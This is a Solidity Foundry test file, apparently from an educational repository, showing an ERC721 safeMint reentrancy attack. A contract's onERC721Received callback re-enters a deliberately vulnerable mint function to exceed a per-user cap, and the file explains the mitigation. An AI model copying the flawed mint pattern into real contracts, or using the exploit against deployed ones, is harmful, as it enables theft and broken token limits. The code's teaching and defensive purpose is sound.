-
Notifications
You must be signed in to change notification settings - Fork 287
/
Copy pathUnprotected-callback.sol
76 lines (62 loc) · 2.34 KB
/
Unprotected-callback.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;
import "forge-std/Test.sol";
import "@openzeppelin/contracts/token/ERC721/extensions/ERC721Enumerable.sol";
/*
Name: Unprotected callback - ERC721 SafeMint reentrancy
Description:
The contract ContractTest is exploiting a callback feature to bypass the maximum mint limit
set by the MaxMint721 contract. This is achieved by triggering the onERC721Received function,
which internally calls the mint function again. Therefore, although MaxMint721 attempts
to limit the number of tokens that a user can mint to MAX_PER_USER, the ContractTest contract
successfully mints more tokens than this limit.
Scenario:
This excersise is about a contract that via callback function to mint more NFTs
Mitigation:
Follow check-effect-interaction and use OpenZeppelin Reentrancy Guard.
REF
https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a
https://www.paradigm.xyz/2021/08/the-dangers-of-surprising-code
*/
contract ContractTest is Test {
MaxMint721 MaxMint721Contract;
bool complete;
uint256 maxMints = 10;
address alice = vm.addr(1);
address eve = vm.addr(2);
function testSafeMint() public {
MaxMint721Contract = new MaxMint721();
MaxMint721Contract.mint(maxMints);
console.log("Bypassed maxMints, we got 19 NFTs");
assertEq(MaxMint721Contract.balanceOf(address(this)), 19);
console.log("NFT minted:", MaxMint721Contract.balanceOf(address(this)));
}
function onERC721Received(
address,
address,
uint256,
bytes memory
) public returns (bytes4) {
if (!complete) {
complete = true;
MaxMint721Contract.mint(maxMints - 1);
console.log("Called with :", maxMints - 1);
}
return this.onERC721Received.selector;
}
receive() external payable {}
}
contract MaxMint721 is ERC721Enumerable {
uint256 public MAX_PER_USER = 10;
constructor() ERC721("ERC721", "ERC721") {}
function mint(uint256 amount) external {
require(
balanceOf(msg.sender) + amount <= MAX_PER_USER,
"exceed max per user"
);
for (uint256 i = 0; i < amount; i++) {
uint256 mintIndex = totalSupply();
_safeMint(msg.sender, mintIndex);
}
}
}